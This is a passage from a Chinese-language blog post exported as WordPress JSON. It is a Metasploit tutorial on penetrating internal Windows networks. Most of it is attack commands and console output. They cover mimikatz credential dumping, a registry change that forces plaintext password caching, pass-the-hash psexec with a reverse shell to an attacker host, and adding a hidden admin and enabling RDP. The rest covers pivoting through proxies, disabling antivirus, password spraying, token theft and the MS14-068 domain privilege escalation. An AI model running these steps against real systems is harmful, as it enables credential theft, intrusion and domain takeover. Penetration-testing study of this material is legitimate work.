alt=\"1746687352768-90c3e908-c281-421b-a81a-068b6322b4c4.png\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">creds_all\n#\u8be5\u547d\u4ee4\u53ef\u4ee5\u5217\u4e3e\u7cfb\u7edf\u4e2d\u7684\u660e\u6587\u5bc6\u7801\nkiwi_cmd\nkiwi_cmd \u6a21\u5757\u53ef\u4ee5\u8ba9\u6211\u4eec\u4f7f\u7528mimikatz\u7684\u5168\u90e8\u529f\u80fd\uff0c\u8be5\u547d\u4ee4\u540e\u9762\u63a5 mimikatz.exe \u7684\u547d\u4ee4\nkiwi_cmd sekurlsa::logonpasswords<\/code><\/pre>\n<p>\u63d0\u793a<\/p>\n<p>\u5728Windows2012\u7cfb\u7edf\u53ca\u4ee5\u4e0a\u7684\u7cfb\u7edf\uff0c\u9ed8\u8ba4\u5728\u5185\u5b58\u7f13\u5b58\u4e2d\u7981\u6b62\u4fdd\u5b58\u660e\u6587\u5bc6\u7801\u7684\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u6ce8\u518c\u8868\u7684\u65b9\u5f0f\u6293\u53d6\u660e\u6587\uff0c\u9700\u8981\u7528\u6237\u91cd\u65b0\u767b\u5f55\u540e\u624d\u80fd\u6210\u529f\u6293\u53d6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest \/v\nUseLogonCredential \/t REG_DWORD \/d 1 \/f<\/code><\/pre>\n<h1>\u5185\u7f51\u6e17\u900f psexec<\/h1>\n<p>\u5728metasploite\u4e2d\u5b58\u5728\u4e00\u4e2apsexec\u6a21\u5757\u53ef\u4ee5\u4f7f\u7528\u83b7\u53d6\u7684hash\u8fdb\u884c\u767b\u5f55<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">use exploit\/windows\/smb\/psexec\nset SMBUser administrator\nset smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4\nset payload windows\/meterpreter\/reverse_tcp\nset lhost 10.10.10.139\nset lport 6666\nexploit<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae31014fec.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690344434-881901b4-8ea0-4588-bdf9-455ae3cbc236.png\" \/>\u9664\u4e86\u53ef\u4ee5\u7528hash \u4e5f\u53ef\u4ee5\u4f7f\u7528\u660e\u6587<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae31372561.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690353573-3ae31c3d-4da4-4d9a-8151-96f932932355.png\" \/><\/p>\n<h1>\u5185\u7f51\u6e17\u900f \u5f00\u542f\u8fdc\u7a0b\u7ec8\u7aef \u6dfb\u52a0\u8d26\u53f7<\/h1>\n<p>getgui \u6a21\u5757\u2014\u2014\u5f00\u542f\u8fdc\u7a0b\u684c\u9762<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">run getgui -e \u5f00\u542f\u8fdc\u7a0b\u7ec8\u7aef\nrun post\/windows\/manage\/enable_rdp\nrun getgui -u m -p QWEasd123 \u6dfb\u52a0\u672c\u5730\u7ba1\u7406\u5458<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae31c6e06f.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690388238-ba9611f3-0a5e-41b3-a80f-09353f8d804b.png\" \/><\/p>\n<h1>\u7aef\u53e3\u8f6c\u53d1<\/h1>\n<p>\u5982\u679c\u670d\u52a1\u5668\u9632\u706b\u5899\u5f00\u542f\u7684\u60c5\u51b5\u4e0b\uff0c\u6709\u53ef\u80fd\u62e6\u622a\u8fdc\u7a0b\u7ec8\u7aef\u7aef\u53e3\uff0c\u4f7f\u7528\u547d\u4ee4\u628a\u8fdc\u7a0b\u7aef\u53e33389\u8f6c\u53d1\u51fa\u6765<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">Usage: portfwd [-h] [add | delete | list | flush] [args]\nOPTIONS:\n-L &lt;opt&gt; Forward: local host to listen on (optional). Reverse: local host to\nconnect to.\n-R Indicates a reverse port forward.\n-h Help banner.\n-i &lt;opt&gt; Index of the port forward entry to interact with (see the \"list\"\ncommand).\n-l &lt;opt&gt; Forward: local port to listen on. Reverse: local port to connect\nto.\n-p &lt;opt&gt; Forward: remote port to connect to. Reverse: remote port to listen\non.\n-r &lt;opt&gt; Forward: remote host to connect to<\/code><\/pre>\n<p>\u8f6c\u53d13389\u7aef\u53e3<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">ortfwd add -l 1234 -p 3389 -r \u53d7\u5bb3\u8005\u4e3b\u673a\nrdesktop 127.0.0.1:1234<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae31f61bf1.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690420229-b102362d-4c32-4183-9e4d-f186a962a181.png\" \/><\/p>\n<h1>\u8de8\u8def\u7531\u8bbf\u95ee<\/h1>\n<p>\u5728\u6e17\u900f\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u7ecf\u5e38\u62ff\u5230web\u4e3b\u673a\u4e0e\u6570\u636e\u5e93\u4e0d\u540c\u5728\u4e00\u4e2a\u7f51\u6bb5\uff0c\u53ef\u4ee5\u5f97\u51fa\u8fd9\u53f0\u4e3b\u673a\u8fd8\u8fde\u7740\u4e00\u4e2a\u5185\u7f51\uff0c\u5982\u679c\u60f3\u8981\u7ee7\u7eed\u6e17\u900f\u5185\u7f51\uff0c\u53ef\u4ee5\u628a\u8fd9\u53f0web\u4e3b\u673a\u5f53\u4f5c\u8df3\u677f\u673a\uff0c\u5bf9\u5185\u7f51\u8fdb\u884c\u6e17\u900f<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae321f302f.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690436698-349f8766-bcec-4225-872b-76f0dca722c3.png\" \/><\/p>\n<p>kali\u65e0\u6cd5\u76f4\u63a5\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a \u4f46\u662fkali\u83b7\u53d6\u53d7\u5bb3\u8005\u7684\u6743\u9650 \u5f97\u77e5\u53ef\u4ee5\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7\u53d7\u5bb3\u8005\u505a\u8df3\u677f\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a<\/p>\n<p>\u83b7\u53d6\u5185\u7f51\u7f51\u5361\u547d\u4ee4<\/p>\n<p>run get_local_subnets<\/p>\n<p>\u7ed1\u5b9a\u8def\u7531 \u4e0d\u7ed1\u5b9a\u8def\u7531\u5c31\u6ca1\u6cd5\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">run autoroute -s 10.10.10.0\/24\nroute add 10.10.10.0 255.255.255.0 1\nroute print<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae32416603.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690465350-3a9baaec-f18c-413a-9fd0-bbc350745544.png\" \/><\/p>\n<p>\u4f7f\u7528\u96a7\u9053 \u9ed8\u8ba4\u662f\u4f7f\u7528socks5 \u4e5f\u53ef\u4ee5\u9009\u62e9socks4a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">use auxiliary\/server\/socks_proxy<\/code><\/pre>\n<p>\u7f16\u8f91\u96a7\u9053\u914d\u7f6e\u6587\u4ef6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sudo vi \/etc\/proxychains4.conf<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae326973cc.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690506429-dab8a7fe-04ee-4fb9-8b1e-4950c547ff57.png\" \/><\/p>\n<p>msf \u4f7f\u7528\u4ee3\u7406\u8bbf\u95ee\u76ee\u6807<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">setg Proxies socks4\/5:ip:port #\u8ba9msf\u6240\u6709\u6a21\u5757\u7684\u6d41\u91cf\u90fd\u901a\u8fc7\u6b64\u4ee3\u7406\u8d70\u3002(setg\u5168\u5c40\u8bbe\u7f6e)\nsetg Proxies socks5:192.168.0.189:1080\nset ReverseAllowProxy true\n#\u5141\u8bb8\u53cd\u5411\u4ee3\u7406\uff0c\u901a\u8fc7socks\u53cd\u5f39shell\uff0c\u5efa\u7acb\u53cc\u5411\u901a\u9053\u3002(\u63a2\u6d4b\u53ef\u4ee5\u4e0d\u8bbe\u7f6e\u6b64\u9879)\nproxychains4 nmap 10.10.10.144 -sT -A -p 445<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae329cc2d3.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690529582-0ae1a23a-255e-4772-ad44-5e02564a0e64.png\" \/><\/p>\n<h1>\u57df\u4fe1\u606f\u6536\u96c6<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">auxiliary\/scanner\/discovery\/arp_sweep #\u57fa\u4e8earp\u534f\u8bae\u53d1\u73b0\u5185\u7f51\u5b58\u6d3b\u4e3b\u673a\uff0c\u8fd9\u4e0d\u80fd\u901a\u8fc7\u4ee3\u7406\u4f7f\u7528\nauxiliary\/scanner\/portscan\/ack #\u57fa\u4e8etcp\u7684ack\u56de\u590d\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\uff0c\u9ed8\u8ba4\u626b\u63cf1-10000\u7aef\u53e3\nauxiliary\/scanner\/portscan\/tcp #\u57fa\u4e8etcp\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\uff0c\u9ed8\u8ba4\u626b\u63cf1-10000\u7aef\u53e3\nauxiliary\/scanner\/discovery\/udp_sweep #\u57fa\u4e8eudp\u534f\u8bae\u53d1\u73b0\u5185\u7f51\u5b58\u6d3b\u4e3b\u673a\nauxiliary\/scanner\/discovery\/udp_probe #\u57fa\u4e8eudp\u534f\u8bae\u53d1\u73b0\u5185\u7f51\u5b58\u6d3b\u4e3b\u673a\nauxiliary\/scanner\/netbios\/nbname #\u57fa\u4e8enetbios\u534f\u8bae\u53d1\u73b0\u5185\u7f51\u5b58\u6d3b\u4e3b\u673a\nauxiliary\/scanner\/ftp\/ftp_version #\u53d1\u73b0\u5185\u7f51ftp\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba421\u7aef\u53e3\nauxiliary\/scanner\/ssh\/ssh_version #\u53d1\u73b0\u5185\u7f51ssh\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba422\u7aef\u53e3\nauxiliary\/scanner\/telnet\/telnet_version #\u53d1\u73b0\u5185\u7f51telnet\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba423\u7aef\u53e3\nauxiliary\/scanner\/dns\/dns_amp #\u53d1\u73b0dns\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba453\u7aef\u53e3\nauxiliary\/scanner\/http\/http_version #\u53d1\u73b0\u5185\u7f51http\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba480\u7aef\u53e3\nauxiliary\/scanner\/http\/title #\u63a2\u6d4b\u5185\u7f51http\u670d\u52a1\u7684\u6807\u9898\nauxiliary\/scanner\/smb\/smb_version #\u53d1\u73b0\u5185\u7f51smb\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba4\u7684445\u7aef\u53e3\nuse auxiliary\/scanner\/mssql\/mssql_schemadump #\u53d1\u73b0\u5185\u7f51SQLServer\u670d\u52a1,\u57fa\u4e8e\u9ed8\u8ba4\u76841433\u7aef\u53e3\nuse auxiliary\/scanner\/oracle\/oracle_hashdump #\u53d1\u73b0\u5185\u7f51oracle\u670d\u52a1,\u57fa\u4e8e\u9ed8\u8ba4\u76841521\u7aef\u53e3\nauxiliary\/scanner\/mysql\/mysql_version #\u53d1\u73b0\u5185\u7f51mysql\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba43306\u7aef\u53e3\nauxiliary\/scanner\/rdp\/rdp_scanner #\u53d1\u73b0\u5185\u7f51RDP\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba43389\u7aef\u53e3\nauxiliary\/scanner\/redis\/redis_server #\u53d1\u73b0\u5185\u7f51Redis\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba46379\u7aef\u53e3\nauxiliary\/scanner\/db2\/db2_version #\u63a2\u6d4b\u5185\u7f51\u7684db2\u670d\u52a1\uff0c\u57fa\u4e8e\u9ed8\u8ba4\u768450000\u7aef\u53e3\nauxiliary\/scanner\/netbios\/nbname<\/code><\/pre>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">run post\/windows\/gather\/enum_logged_on_users #\u67e5\u770b\u767b\u5f55\u8fc7\u7684\u7528\u6237\u4fe1\u606f\nrun post\/windows\/gather\/enum_ad_groups #\u67e5\u770b\u7ec4\u4fe1\u606f\nrun post\/windows\/gather\/enum_domain #\u5b9a\u4f4d\u57df\u63a7\nrun post\/windows\/gather\/enum_ad_computers #\u57df\u5185\u6240\u6709\u673a\u5668\nuse post\/windows\/gather\/enum_patches #\u53d1\u73b0\u7f3a\u5931\u7684\u8865\u4e01\nuse post\/multi\/recon\/local_exploit_suggester #\u5feb\u901f\u8bc6\u522b\u53ef\u80fd\u88ab\u5229\u7528\u7684\u6f0f\u6d1e\nrun post\/windows\/manage\/migrate #\u81ea\u52a8\u8fdb\u7a0b\u8fc1\u79fb\nrun post\/windows\/gather\/checkvm #\u67e5\u770b\u76ee\u6807\u4e3b\u673a\u662f\u5426\u8fd0\u884c\u5728\u865a\u62df\u673a\u4e0a\nrun post\/windows\/manage\/killav #\u5173\u95ed\u6740\u6bd2\u8f6f\u4ef6\nrun post\/windows\/manage\/enable_rdp #\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\nrun post\/windows\/manage\/autoroute #\u67e5\u770b\u8def\u7531\u4fe1\u606f\nrun post\/windows\/gather\/enum_logged_on_users #\u5217\u4e3e\u5f53\u524d\u767b\u5f55\u7684\u7528\u6237\nrun post\/windows\/gather\/enum_applications #\u5217\u4e3e\u5e94\u7528\u7a0b\u5e8f\nrun post\/windows\/gather\/credentials\/windows_autologin #\u6293\u53d6\u81ea\u52a8\u767b\u5f55\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\nrun post\/windows\/gather\/smart_hashdump #dump\u51fa\u6240\u6709\u7528\u6237\u7684hash\nrun post\/windows\/gather\/enum_domain_tokens #\u5bfb\u627e\u57dftoken<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae32d2849e.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690581581-8074ac34-959f-4db9-82cf-f5bb56ef22a5.png\" \/><\/p>\n<h1>\u5bc6\u7801\u55b7\u5c04<\/h1>\n<p>\u68c0\u6d4b \u7528\u6237\u8d26\u53f7<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">auxiliary\/gather\/kerberos_enumusers #Kerberos \u7528\u6237\u540d\u679a\u4e3e\u2013\u7528\u6237\u540d\u5b57\u5178\nhttps:\/\/github.com\/attackdebris\/kerberos_enum_userlists\nmsf6 auxiliary(gather\/kerberos_enumusers) &gt; set DOMAIN redteam.club\nDOMAIN =&gt; redteam.club\nmsf6 auxiliary(gather\/kerberos_enumusers) &gt; set rhosts 10.10.10.137\nrhosts =&gt; 10.10.10.137\nmsf6 auxiliary(gather\/kerberos_enumusers) &gt; set user_file\n~\/Desktop\/kerberos_enum_userlists-master\/Female_First_Names_Top_500.txt\nuser_file =&gt; ~\/Desktop\/kerberos_enum_userlists-\nmaster\/Female_First_Names_Top_500.txt<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae330532ac.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690602719-11a775ac-b12b-4380-a0a5-8d22f14d23db.png\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">use auxiliary\/scanner\/smb\/smb_login<\/code><\/pre>\n<p>\u6ce8\u610f \u5728\u5c1d\u8bd5\u731c\u6d4b\u5bc6\u7801\u65f6, \u5e94\u8003\u8651\u57df\u7684\u5e10\u6237\u9501\u5b9a\u7b56\u7565\u3002\u4e00\u4e2a\u660e\u667a\u7684\u65b9\u6cd5\u662f\u4e00\u6b21\u5c1d\u8bd5\u4e00\u4e2a\u5bc6\u7801, \u9650\u5236\u81ea\u5df1\u731c\u6d4b\u4e24\u6b21(\u7cfb\u7edf\u8bbe\u7f6e\u4e3a\u9501\u5b9a\u540e3\u65e0\u6548\u5c1d\u8bd5) \u6216\u731c\u6d4b\u56db\u6b21(\u7cfb\u7edf\u8bbe\u7f6e\u4e3a\u9501\u5b9a5\u65e0\u6548\u5c1d\u8bd5\u540e) \u6bcf30\u5206\u949f\u5bf9\u4e00\u4e2a\u5e10\u6237\u300230\u5206\u949f\u662f\u5178\u578b\u7684 \u201clockout observation window\u201d<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae3330e0ee.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690627536-ecce66e3-ab27-42f8-b9af-f7a065e36e4d.png\" \/><\/p>\n<h1>\u4ee4\u724c\u767b\u5f55<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">load incognito #\u52a0\u8f7dincognito\nlist_tokens -u #\u5217\u51fa\u5f53\u524d\u7cfb\u7edf\u53ef\u7528\u7684token\nimpersonate_token 'NT AUTHORITYSYSTEM' #\u5047\u5192SYSTEM token\nor\nimpersonate_token NT AUTHORITYSYSTEM #\u53c2\u6570\u4e0d\u52a0\u5355\u5f15\u53f7\u9700\u8981\u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\nrev2self #\u8fd4\u56de\u539f\u59cbtoken<\/code><\/pre>\n<h1>steal_token\u7a83\u53d6\u4ee4\u724c<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">ps #\u67e5\u770b\u7cfb\u7edf\u8fdb\u7a0b\u4fe1\u606f\nsteal_token &lt;pid\u503c&gt; #\u4ece\u6307\u5b9a\u8fdb\u7a0b\u4e2d\u7a83\u53d6token\ndrop_token #\u5220\u9664\u7a83\u53d6\u7684token<\/code><\/pre>\n<h1>\u5185\u7f51\u6e17\u900f \u57df\u666e\u901a\u7528\u6237\u63d0\u6743\u5230\u57df\u63a7\u6743\u9650<\/h1>\n<p>\u5728win2008\u91cc\u53ef\u4ee5\u4f7f MS 14-086 exp\u6a21\u5757\u5bf9\u57df\u666e\u901a\u7528\u6237\u8fdb\u884c\u63d0\u53d6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sf6 auxiliary(admin\/kerberos\/ms14_068_kerberos_checksum) &gt; show options\nModule options (auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum):\nName Current Setting Required\nDescription\n---- --------------- -------- ----------\nDOMAIN moonhack.com yes The Domain\n(upper case) Ex: DEMO.LOCAL\nPASSWORD 123456 yes The Domain\nUser password\nRHOSTS 08server-ad.moonsec.com yes\nThe target host(s), range CIDR identifier, or hosts file with syntax 'file:\n&lt;path&gt;'\nRPORT 88 yes The target\nport\nTimeout 10 yes The TCP\ntimeout to establish connection and read data\nUSER test yes The Domain\nUser\nUSER_SID S-1-5-21-3439616436-2844000184-3841763578-1105 yes The Domain\nUser SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000  <\/code><\/pre>\n<p>\u6267\u884c\u540e\u4f1a\u5728msf\u8def\u9762\u751f\u6210bin\u6587\u4ef6 \u7531\u4e8emsf\u91cc\u7684kiwi\u6a21\u5757\u4e0d\u80fd\u76f4\u63a5\u8fdb\u884c\u5bfc\u5165\uff0c\u6240\u4ee5\u8fd8\u9700\u8981mimikatz\u8fdb\u884c\u8f6c\u6362<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae336b91d9.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690691817-100ccc97-7dd7-439b-a07f-5a506e3bbf0e.png\" \/><\/p>\n<p>mimikatz\u5bf9bin\u6587\u4ef6\u8fdb\u884c\u8f6c\u6362<\/p>\n<p>kerberos::clist<\/p>\n<p>&quot;20211205004239_default_192.168.0.133_windows.kerberos_557337.bin&quot;\/export<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae33ddae13.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690713369-40a51dd8-1890-400a-8884-ce9ccb961d30.png\" \/><\/p>\n<p>\u4f7f\u7528kiwi\u6a21\u5757\u8fdb\u884c\u7968\u636e\u6ce8\u5165 \u4f46\u662f\u5bfc\u5165\u7684\u65f6\u5019\u5931\u8d25\u4e86<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae341ac7f1.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690723658-f3ec3d43-34a1-4d56-8cdf-196b373a58a5.png\" \/><\/p>\n<p>\u53ef\u4ee5\u4f7f\u7528mimikatz\u5bfc\u5165 bin\u6587\u4ef6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">keberos::ptc 20211207002649_default_192.168.0.133_windows.kerberos_202184.bin<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae344ab4f5.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746690742103-2c650580-acba-4b9e-a50e-36fdb232d0f4.png\" \/><\/p>\n<blockquote>\n<p>\u66f4\u65b0: 2025-05-08 15:53:23<br \/>\n\u539f\u6587: <a href=\"https:\/\/www.yuque.com\/yuhui.net\/network\/ogxwxdzi7digxq49\">https:\/\/www.yuque.com\/yuhui.net\/network\/ogxwxdzi7digxq49<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>metasploit \u5185\u7f51\u6e17\u900f \u6982\u8ff0 Metasploit\u5c31\u662f\u4e00\u4e2a\u6f0f\u6d1e\u6846\u67b6\u3002\u5b83\u7684\u5168\u79f0\u53eb\u505aThe Metasploit Framework\uff0c\u7b80\u79f0\u53eb\u505aMSF\u3002Metasploit\u4f5c\u4e3a\u5168\u7403\u6700\u53d7\u6b22\u8fce\u7684\u5de5\u5177\uff0c\u4e0d\u4ec5\u4ec5\u662f\u56e0\u4e3a\u5b83\u7684\u65b9\u4fbf\u6027\u548c\u5f3a\u5927\u6027\uff0c\u66f4\u91cd\u8981\u7684\u662f\u5b83\u7684\u6846\u67b6\u3002\u5b83\u5141\u8bb8\u4f7f\u7528\u8005\u5f00\u53d1\u81ea\u5df1\u7684\u6f0f\u6d1e\u811a\u672c\uff0c\u4ece\u800c\u8fdb\u884c\u6d4b\u8bd5 \u57fa\u672c\u64cd\u4f5c \u8fd0\u884c Shell\u4e2d\u76f4\u63a5\u8f93\u5165msfconsole \u5efa\u7acb\u641c\u7d22\u7f13\u5b58\uff08\u6570\u636e\u5e93\uff09 \u542f\u52a8PostgreSQ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[121,119,2],"tags":[12,17,22,28,29],"class_list":["post-724","post","type-post","status-publish","format-standard","hentry","category-ceshigongju","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-github","tag-windows","tag-kali","tag-java"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=724"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/724\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=724"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=724"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}